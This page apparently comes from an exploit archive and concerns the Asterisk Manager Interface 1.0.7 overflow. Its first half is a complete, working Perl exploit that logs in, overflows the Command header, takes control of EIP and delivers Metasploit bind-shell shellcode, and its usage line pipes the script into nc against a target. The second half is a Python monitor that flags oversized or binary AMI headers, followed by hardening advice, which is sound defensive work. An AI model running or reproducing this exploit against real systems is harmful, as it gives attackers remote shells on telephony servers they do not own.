Asterisk Manager Interface

This working exploit is for the Asterisk Manager Interface overflow vulnerability. The offset will most likely need to be changed to match the target operating system.

Vulnerable versions include 1.0.7 and possibly earlier versions.

Author

Wade Alcorn

Advisory

Bindshell Advisory
Bugtraq BID-14031

Code

#!/usr/bin/perl

# Title: astman.pl
# Purpose: Remote command execution via Asterisk Manager Interface
# Author: Wade Alcorn <wade@bindshell.net>
# URL: http://www.bindshell.net/exploits/
# Advisory: http://staging.bindshell.net/advisories
#           http://www.securityfocus.com/bid/14031/info
# Copyright: Copyright (C) 2005 Wade Alcorn

# Usage: perl astman.pl | nc <host> <port>
# Note: edit the 'Username' and the 'Secret' parameters below
#       to match the target's username and secret. this vulnerability 
#       affects Asterisk 1.0.7 and has been tested on linux.

$actionlogin =  "Action: login";
$actioncmd =    "Action: Command";
$actionid =     "ActionID: ";
$username =     "Username: mark";   # default username
$secret =       "Secret: mysecret"; # default secret
$sep =          "\r\n";

$overflow = 
"Command: \"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"".
"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"".
"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"".
"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"".
"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"".
"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"".
"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"";

# take control of the eip and jump to the start of the "ActionID" 
# param on the stack
$eipcontrol =
"\x54". # push esp
"\x5b". # pop ebx
"\x81\xeb\x01\x01\x01\x01". # sub x01010101 from ebx
"\x81\xc3\x2b\x04\x01\x01". # add x01010101 + 0x0000032b to ebx
"\x89\xd9". # copy ebx to ecx
"\xff\xe1"; # jump to ecx value

#bindshell code (from http://www.metasploit.com/)
$shellcode =
"\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x95".
"\x02\xaa\xb7\x83\xeb\xfc\xe2\xf4\xa4\xd9\xf9\xf4\xc6\x68\xa8\xdd".
"\xf3\x5a\x33\x3e\x74\xcf\x2a\x21\xd6\x50\xcc\xdf\x84\x5e\xcc\xe4".
"\x1c\xe3\xc0\xd1\xcd\x52\xfb\xe1\x1c\xe3\x67\x37\x25\x64\x7b\x54".
"\x58\x82\xf8\xe5\xc3\x41\x23\x56\x25\x64\x67\x37\x06\x68\xa8\xee".
"\x25\x3d\x67\x37\xdc\x7b\x53\x07\x9e\x50\xc2\x98\xba\x71\xc2\xdf".
"\xba\x60\xc3\xd9\x1c\xe1\xf8\xe4\x1c\xe3\x67\x37";

print $actionlogin.$sep.$username.$sep.$secret.$sep.$sep.$actioncmd.$sep.
$overflow.$eipcontrol.$sep.$actionid.$shellcode.$sep.$sep.$sep;
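The script above shows the shape of the traffic a vulnerable manager sees: an authenticated login (the attack needs a valid manager username and secret), then a Command action whose Command header is padded far beyond any real CLI command and ends in raw machine code, with more raw bytes in the ActionID header. That shape is what a defender can look for on the manager port. The following is an added example, not part of the advisory or Wade Alcorn's code, written from the monitoring side: it splits a captured AMI client stream into actions (CRLF-separated "Key: value" headers, blank-line terminated, exactly as the script emits them) and reports headers that carry non-printable bytes or a Command value longer than a threshold. The function names, the 256-byte threshold and the sample streams are all assumptions constructed for illustration; the suspicious sample only imitates the exploit's layout and contains no payload.

```python
import re

# Assumption for illustration: no legitimate manager CLI command is this long.
MAX_COMMAND_LEN = 256

# AMI header values should be printable ASCII; tab is tolerated because the
# original script shows it inside a Command value and some CLI input may use it.
PRINTABLE = re.compile(rb"^[\t\x20-\x7e]*$")


def parse_ami_actions(stream: bytes):
    """Split a raw AMI client stream into actions.

    Each action is a list of (key, value) byte pairs; actions are separated by a
    blank line, and a line without ': ' is kept with an empty key so it is still audited.
    """
    actions = []
    for block in stream.split(b"\r\n\r\n"):
        headers = []
        for line in block.split(b"\r\n"):
            if not line:
                continue
            key, sep, value = line.partition(b": ")
            headers.append((key, value) if sep else (b"", line))
        if headers:
            actions.append(headers)
    return actions


def audit_action(headers):
    """Return human-readable findings for one action (empty list means nothing odd)."""
    findings = []
    for key, value in headers:
        name = key.decode(errors="replace") or "malformed line"
        if not PRINTABLE.match(value):
            findings.append(f"non-printable bytes in {name}")
        if key == b"Command" and len(value) > MAX_COMMAND_LEN:
            findings.append(f"Command header length {len(value)} exceeds {MAX_COMMAND_LEN}")
    return findings


def audit_stream(stream: bytes):
    """Audit every action in a stream; returns (action index, finding) tuples."""
    results = []
    for index, headers in enumerate(parse_ami_actions(stream)):
        for finding in audit_action(headers):
            results.append((index, finding))
    return results


def build_constructed_samples():
    """Two constructed client streams: a normal session and one shaped like the exploit."""
    login = b"Action: login\r\nUsername: mark\r\nSecret: mysecret\r\n\r\n"
    benign = login + b"Action: Command\r\nCommand: sip show peers\r\nActionID: 42\r\n\r\n"
    # Constructed stand-in for the overflow layout: a padded Command value that
    # ends in arbitrary binary, and an ActionID carrying raw bytes. Not the page's payload.
    padded_command = b'""\t' * 100 + b"\xc3\x90\x00\xff"
    binary_action_id = b"\xc3\x00\xff\x90"
    suspicious = (login + b"Action: Command\r\n"
                  b"Command: " + padded_command + b"\r\n"
                  b"ActionID: " + binary_action_id + b"\r\n\r\n\r\n")
    return benign, suspicious


if __name__ == "__main__":
    benign, suspicious = build_constructed_samples()
    print("benign:", audit_stream(benign))
    print("suspicious:", audit_stream(suspicious))
```

Run the module directly to see both samples audited; the benign session yields no findings, while the exploit-shaped one is flagged on both the Command and ActionID headers of its second action. In practice the same check can be applied to a packet capture of the manager port, and the finding that matters most is the one the page makes implicit: because the overflow is reached only after a successful login, the manager port should not be reachable beyond the hosts that need it and manager secrets deserve the same care as any other administrative credential, in addition to upgrading past 1.0.7.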